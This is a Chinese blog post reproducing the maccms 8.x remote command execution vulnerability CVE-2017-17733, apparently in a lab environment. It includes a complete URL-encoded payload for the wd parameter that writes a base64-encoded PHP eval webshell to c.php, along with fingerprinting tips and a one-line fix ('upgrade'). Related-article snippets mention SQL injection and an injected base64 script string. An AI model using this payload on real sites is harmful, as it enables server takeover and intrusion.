【漏洞复现】六、maccms 远程命令执行(CVE-2017-17733)

最新推荐文章于 2024-09-20 11:14:27 发布
原创 最新推荐文章于 2024-09-20 11:14:27 发布 · 1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #web安全

本文围绕maccms远程命令执行(CVE - 2017 - 17733)漏洞展开,介绍了可控参数、fputs()和fopen()等储备知识,阐述漏洞原理,指出影响版本为maccms8.X,说明了指纹识别方法,给出两种漏洞复现方式,最后建议通过升级新版本进行修补整改。

【漏洞复现】六、maccms 远程命令执行(CVE-2017-17733)

6.0、储备知识

1、可控参数

(审计)

2、fputs()函数

函数写入文件(可安全用于二进制文件),fputs() 函数是 fwrite() 函数的别名

fputs(file,string,length)

3、fopen() 函数

打开文件或者 URL,如果打开失败,本函数返回 FALSE

fopen(filename,mode,include_path,context)

6.1、漏洞原理

远程攻击者可借助index.php?m=vod-search请求中的‘wd’参数利用该漏洞执行命令

具体漏洞原理请移步至:​​黑色地带(崛起)的人类高质量文章​

6.2、影响版本

maccms8.X 

6.3、指纹识别

1.页面源码中引用了/template/paody/路径的文件

2.使用指纹识别类平台识别。 

6.4、漏洞复现

漏洞点

http://ip:port/index.php?m=vod-search

在此页面抓包

方法一:change request method -->添加poc(poc内容如下)

内容为在网站根目录下生一个c.php的木马,连接密码为c

wd={if-A:print(fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}

这个马子进行了编码绕过,通过base64编码写入一句话木马<?php @eval($_POST[‘c’]); ?>

这个马子还做了url的编码

方法二:直接GET改POST后加入poc内容

flag-{bmh7d80d290-a5b8-43d4-bbb9-d7145a4b177b}

6.5、修补整改

升级新版本

漏洞复现maccms苹果cms 命令执行漏洞
失心少年
11-16 3110
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。“苹果CMS” 似乎是指 “Maccms”,这是一款开源的内容管理系统,主要用于搭建视频网站。Maccms 提供了一套完整的解决方案,包括用户管理、视频上传、分类管理、数据统计等功能,使用户能够方便地创建和管理自己的视频网站。
苹果MAC-CMS漏洞复现(SQL注入+命令执行漏洞写shell)
信安小菜鸡的博客
05-19 4390
前台修改密码处存在sql注入漏洞 注册账户登录后发送POST 查看数据库 查看用户 不过后续操作一直被拦截,暂未找到过滤方法 命令执行漏洞 直接获取php info信息 写shell 弱口令 admin/admin/123456 ...
苹果cms10的一次尝试发现了苹果cms10被挂马极有可能是苹果cms作者故意的js漏洞或后门导致
jun2016425的博客
10-30 1万+
最近闲无事想建个站来玩玩,但是又不想写于是乎就找了搜索了一下,苹果cms就出现在搜索引擎上面了,看来苹果cms的SEO做的还是不错的. 被挂马表现: 播放视频时,有一定的概率会加载 http://union.maccms.com/html/top10.js 苹果cms后台某处或者采集的资源打印奇怪的字符比如 {if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hZDIxMjMubHNqcG9ybi50b3AvdXBsb2FkL2FhYWEuan.
maccms 远程命令执行CVE-2017-17733
weixin_42675091的博客
09-23 991
maccms 远程命令执行CVE-2017-17733
vulfocus——maccms远程命令执行(CVE-2017-17733
m0_62063669的博客
09-12 1994
Maccms 8.x版本中存在安全漏洞远程攻击者可借助index.php?m=vod-search请求中的‘wd’参数利用该漏洞执行命令。2.借助index.php?m=vod-search请求中的‘wd’参数利用该漏洞执行命令。利用浏览器浏览器发送POST数据包或直接使用Python编写的脚本进行发送POST数据包。3.进行攻击,该payload是直接生成一个c.php一句话木马文件,连接密码为c。Maccms是一套跨平台的基于PHP和MySQL快速建站系统。
如何使用php判断远程图片文件是否存在
徊忆羽菲
07-03 441
使用php判断远程图片文件是否存在fopen()方法mode 参数的可能的值 fopen()方法 看看文件能否打开,能打就文件当然就存在 <?php $url = 'http://www.qipa250.com/images/qipa250.jpg'; if( @fopen( $url, 'r' ) ) { echo 'File Exits'; } else { echo 'File Do Not Exits'; } ?> 语法:fopen(filename,mode
【传送点】上千漏洞复现复现集合 exp poc 持续更新
失心少年
11-28 4559
漏洞复现】OpenTSDB 2.4.0 命令注入(CVE-2020-35476)漏洞复现漏洞复现】熊海cms 存在sql注入 附poc【漏洞复现】Array VPN任意文件读取漏洞漏洞复现】好视通视频会议系统(fastmeeting) toDownload.do接口存在任意文件读取漏洞 附POC【漏洞复现】金蝶云星空管理中心 ScpSupRegHandler接口存在任意文件上传漏洞 附POC【漏洞复现】DPTech VPN存在任意文件读取漏洞
魅魔视频电影程序(MacCMS ASP) 6.1 20120511-ASP源码.zip
12-12
ASP源码,压缩包解压密码:www.cqlsoft.com
实训商业源码-MacCms-v1.3.20-毕业设计.zip
最新发布
05-09
实训商业源码-MacCms-v1.3.20-毕业设计.zip文件内容涉及的是一项结合了商业实践与学术研究的项目。MacCms-v1.3.20作为文件名,暗示这是一个成熟版本的管理系统内容,适用于网站内容管理、构建和维护。MacCms可能是一...
MACCMS 远程命令执行漏洞复现CVE-2017-17733
lmei1228的博客
09-20 2252
MACCMS是一套采用PHP/MySQL数据库运行的全新且完善的强大视频电影系统。完美支持众多视频网站和高清播放器(youku,tudou,qvod,gvod等),完全免费开源。该漏洞主要的产生原因是CMS搜索页面搜索参数过滤不严导致直接eval执行PHP语句----(一句话木马)。(上面这段概述引自vulfocus哈)
maccmsv10仿优酷模版最新修复bug完美版
03-22
maccmsv10仿优酷模版最新修复bug完美版,是小的我经过修改的完美版本,修复了部分图片显示不全的问题,放大了今日热点图片显示。留言框更加美观贴心! 演示站点:http://tsmp4.net
苹果CMS漏洞
热门推荐
Grey的博客
07-11 1万+
1.环境搭建: 最新版本好像修复了这个漏洞 后来看大佬们分析是加了360safe、把他注释掉就可以复现了 审计过程:   首先在maccms8_mfb\inc\module\vod.php文件中的第93-98行的代码当$method=search成立的时候便回进入到be(“all”, “wd”)获取请求中wd参数的值,并使用chkSql($wd)方法对$wd进行安全处理。 ...
Maccms8.x 命令执行漏洞分析
fly小灰灰的专栏
07-30 7634
1. 漏洞描述 漏洞简述: Maccms搜索页面搜索输入参数过滤不严谨导致前台命令执行可getshell 影响版本: Maccms8.x 2. 漏洞简介  魅魔电影程序(Maccms PHP)是一套采用PHP/MySQL数据库运行的全新且完善的强大视频电影系统。完美支持众多视频网站和高清播放器(youku,tudou,qvod,gvod等),完全免费开源。  该漏洞主要的产生原因是CMS搜索页面搜索
maccms代码审计——前台sql注入漏洞
willow_liang的博客
11-06 2213
漏洞存在路径:C:\phpstudy\WWW\maccms\inc\common\function.php第572行的htmlEncode函数 审计过程: 1.在C:\phpstudy\WWW\maccms\inc\module\vod.php93-98 2.跟进图中的be方法
Maccms命令执行(CVE-2017-17733)
m0_65150886的博客
02-26 681
远程攻击者可借助index.php?m=vod-search请求中的‘wd’参数利用该漏洞执行命令。2.通过火狐浏览器访问http://ip:port/index.php?Maccms是一套跨平台的基于PHP和MySQL快速建站系统。1.访问http://ip:port,出现如下页面,开始实验。url地址:http://ip:port/c.php。Maccms 8.x版本中存在。3.蚁剑连接,getshell。
苹果maccms网站漏洞进行修复解决方法教程
weixin_46020146的博客
09-05 383
苹果maccms网站漏洞进行修复解决方法教程
maccms 远程命令执行CVE-2017-17733复现
weixin_63124284的博客
10-28 1353
完美支持众多视频网站和高清播放器(youku,tudou,qvod,gvod等),完全免费开源。该漏洞主要的产生原因是CMS搜索页面搜索参数过滤不严导致直接eval执行PHP语句。
maccms-cve_2017_17733漏洞复现
qq_51459600的博客
03-02 4240
maccms-cve_2017_17733 Maccms是一套跨平台的基于PHP和MySQL快速建站系统。 Maccms 8.x版本中存在安全漏洞远程攻击者可借助index.php?m=vod-search请求中的‘wd’参数利用该漏洞执行命令。 环境搭建 靶机:CentOS7(192.168.2.110) 利用本地vulfocus平台一键搭建maccms环境: 环境搭建完成 漏洞利用 访问http://192.168.2.110:59973/index.php?m=vod-search post提
苹果cms v8和v10程序漏洞被注入恶意代码修复说明
weixin_46135740的博客
01-16 3087
大家好! 苹果cms v8被大规模注入恶意代码,导致很多人都不敢在用,无论官方怎么修复,更新,都无济于事。到底是什么原因呢! 网上有很多人提到了,黑客是如何入侵网站找到漏洞在植入代码,但是几乎都没说到应该怎么禁止,或者预防, 我是怎么发现网站被挂码的,我从搭建电影站开始,一直使用苹果cms,说实在话,简单易懂,好操作,而且带有站群插件,真的是一款相当不错的cms程序, 有一天,我公众号的粉丝给我留...
MACCMS10主题开发实践:maccms10-mytheme-26的探索
从给定的文件信息中,我们可以提取到以下关键词:标题“maccms10-mytheme-26”,描述“maccms10-mytheme-26”,标签“PHP”,以及压缩包子文件的名称“maccms10-mytheme-26-master”。 接下来,我将针对这些关键词...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

༄༊ξ陈丞(网安圈花瓶)࿐

点个关注呗。

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值